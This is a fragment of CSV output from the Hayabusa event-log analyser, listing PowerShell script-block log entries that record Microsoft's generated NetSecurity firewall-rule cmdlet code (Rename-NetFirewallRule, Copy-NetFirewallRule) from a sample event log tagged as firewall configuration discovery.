([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_met",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"hodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdle",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"t.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains 